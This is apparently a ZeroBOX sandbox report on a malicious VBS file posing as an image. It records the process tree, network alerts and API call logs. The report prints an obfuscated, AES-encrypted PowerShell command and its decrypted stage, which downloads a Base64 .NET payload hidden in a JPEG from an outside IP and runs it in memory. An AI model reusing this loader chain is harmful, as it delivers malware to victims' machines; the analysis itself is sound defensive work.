popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

weseethesimplethingsalwaystoget.gIF.vbs

Generic Malware Antivirus PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 July 30, 2024, 10:08 a.m. July 30, 2024, 10:10 a.m.
Size 405.3KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5 c7f6cf5da3192c2cae7d911ee67f6620
SHA256 8ec7a5b08caf43325e9c75d3e9397418abe644cfc39185f5bc0ac5a9e954f858
CRC32 1FF1BCC4
ssdeep 3072:sHGowfvYF7hNe4VTdRnTT8w4TWIdqruoJTgCOpBKEMDS7opi70cmt07CjeJIvv:OwfvYFqdqR
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\weseethesimplethingsalwaystoget.gIF.vbs

    2552

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')

      2632

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
198.46.176.133 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 198.46.176.133:80 -> 192.168.56.101:49163 2047750 ET MALWARE Base64 Encoded MZ In Image A Network Trojan was detected
TCP 198.46.176.133:80 -> 192.168.56.101:49163 2049038 ET MALWARE Malicious Base64 Encoded Payload In Image A Network Trojan was detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Method invocation failed because [System.Security.Cryptography.AesManaged] does
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: n't contain a method named 'Dispose'.
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At line:1 char:715
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + function Decrypt-AESEncryption {Param([String]$Base64Text,[String]$Key)$aesMa
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: naged = New-Object System.Security.Cryptography.AesManaged;$aesManaged.Mode = [
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: System.Security.Cryptography.CipherMode]::CBC;$aesManaged.Padding = [System.Sec
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: urity.Cryptography.PaddingMode]::Zeros;$aesManaged.BlockSize = 128;$aesManaged.
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: KeySize = 256;$aesManaged.Key = (New-Object System.Security.Cryptography.SHA256
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Key));$cipherBytes
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: = [System.Convert]::FromBase64String($Base64Text);$aesManaged.IV = $cipherBytes
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: [0..15];$decryptor = $aesManaged.CreateDecryptor();$decryptedBytes = $decryptor
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: .TransformFinalBlock($cipherBytes, 16, $cipherBytes.Length - 16);$aesManaged.Di
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: spose <<<< ();return [System.Text.Encoding]::UTF8.GetString($decryptedBytes).Tr
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: im([char]0);}$chave = "87355924191917571657221755980918";$textoCriptografadoBas
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: e64 = "uNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihk
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: i2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoP
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: AD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4t
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: kwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keT
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: DVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67a
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: spbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQ
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: mmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX8
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: 3PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: 2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rl
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: Q2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcr
console_handle: 0x00000137
1 1 0

WriteConsoleW

 buffer: RaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1Naa
console_handle: 0x00000143
1 1 0

WriteConsoleW

 buffer: MlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0
console_handle: 0x0000014f
1 1 0

WriteConsoleW

 buffer: xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcm
console_handle: 0x0000015b
1 1 0

WriteConsoleW

 buffer: rf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28r
console_handle: 0x00000167
1 1 0

WriteConsoleW

 buffer: b84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACG
console_handle: 0x00000173
1 1 0

WriteConsoleW

 buffer: oSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm
console_handle: 0x0000017f
1 1 0

WriteConsoleW

 buffer: /dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6l
console_handle: 0x0000018b
1 1 0

WriteConsoleW

 buffer: T/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMu
console_handle: 0x00000197
1 1 0

WriteConsoleW

 buffer: twbB720ZK5BpUkQ==";$textoDescriptografado = Decrypt-AESEncryption -Base64Text $
console_handle: 0x000001a3
1 1 0

WriteConsoleW

 buffer: textoCriptografadoBase64 -Key $chave;Write-Host "Texto Descriptografado: $texto
console_handle: 0x000001af
1 1 0

WriteConsoleW

 buffer: Descriptografado";Invoke-Expression $textoDescriptografado;
console_handle: 0x000001bb
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (Dispose:String) [], RuntimeEx
console_handle: 0x000001c7
1 1 0

WriteConsoleW

 buffer: ception
console_handle: 0x000001d3
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : MethodNotFound
console_handle: 0x000001df
1 1 0

WriteConsoleW

 buffer: Texto Descriptografado: $link = 'http://198.46.176.133/Upload/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NEB/74/11.321.542.271//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }
console_handle: 0x000001fb
1 1 0

WriteConsoleW

 buffer: Exception calling "Invoke" with "2" argument(s): "The requested security protoc
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: ol is not supported."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At line:1 char:916
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + $link = 'http://198.46.176.133/Upload/vbs.jpeg'; $webClient = New-Object Syst
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: em.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catc
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: h { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.G
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: etString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE6
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: 4_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $sta
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: rtIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64C
console_handle: 0x0000009b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e6d80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7500
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7500
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7500
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7500
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7500
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7500
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e6d40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e6d40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e6d40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e6940
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e75c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e75c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e7180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e6c40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002e6c40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://198.46.176.133/Upload/vbs.jpeg
request GET http://198.46.176.133/Upload/vbs.jpeg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 1638400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02737000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02722000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02735000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
